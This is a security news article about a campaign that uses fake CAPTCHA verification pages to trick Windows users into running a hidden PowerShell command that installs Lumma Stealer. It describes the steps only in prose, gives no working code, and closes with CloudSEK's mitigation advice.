Fake human verification pages spread Lumma Stealer malware
CloudSEK's Threat Intelligence team has discovered an innovative method of distributing the Lumma Stealer malware through fake human verification pages. This approach, first identified by Unit42 at Palo Alto Networks, specifically targets Windows users but can potentially deliver various malicious software.
The cybercriminals behind this campaign are setting up phishing websites hosted on platforms commonly perceived as safe, such as Amazon S3 and content delivery networks (CDNs). These sites trick users into completing a fake Google CAPTCHA verification. Upon clicking the "Verify" button, users are misled into following specific instructions: opening the Run dialogue (Win+R), pasting copied content, and pressing Enter.
According to CloudSEK, this action triggers a hidden JavaScript function, which copies a base64-encoded PowerShell command to the user's clipboard. When the user executes this command, it silently downloads the Lumma Stealer malware from a remote server, compromising the system.
Anshuman Das, Security Researcher at CloudSEK, said, "This new tactic is particularly dangerous because it plays on users' trust in widely recognized CAPTCHA verifications, which they encounter regularly online. By disguising malicious activity behind what seems like a routine security check, attackers can easily trick users into executing harmful commands on their systems. What's more concerning is that this technique, currently distributing the Lumma Stealer, could be adapted to spread other types of malware, making it a highly versatile and evolving threat."
The infection process typically involves several steps. Initially, the user is directed to a fake verification page. A PowerShell script is then copied to the clipboard through the deceptive CAPTCHA prompt. When the script is executed, it runs PowerShell in a hidden window, downloading Lumma Stealer from a remote server. The malware then establishes connections with attacker-controlled domains, putting users and their data at risk.
CloudSEK's key observations include the use of base64 encoding and clipboard manipulation to avoid detection. The fake human verification pages are found on well-known platforms such as Amazon S3 and CDNs. Additionally, the malware can download further components, complicating its detection and analysis. Although this campaign primarily targets Lumma Stealer distribution, it poses a risk of tricking users into downloading various kinds of malicious files to their Windows devices.
CloudSEK has recommended a few measures to mitigate these threats. Users and organisations should educate employees about this new social engineering tactic, specifically the danger of copying and pasting unknown commands. Organisations are also advised to deploy advanced endpoint protection solutions capable of detecting and blocking PowerShell-based attacks, monitor network traffic for suspicious connections to newly registered or uncommon domains, and maintain systems with regular updates and patches to reduce vulnerabilities exploited by Lumma Stealer.
In light of these findings, individuals and organisations must remain vigilant against emerging threats like the Lumma Stealer malware. Cybercriminals' innovative methods underscore the importance of ongoing education and awareness regarding social engineering tactics. By implementing robust cybersecurity measures, including advanced endpoint protection and regular system updates, users can better safeguard their systems against these evolving threats. As malware distribution techniques advance, a proactive approach will be essential in maintaining security and protecting sensitive information.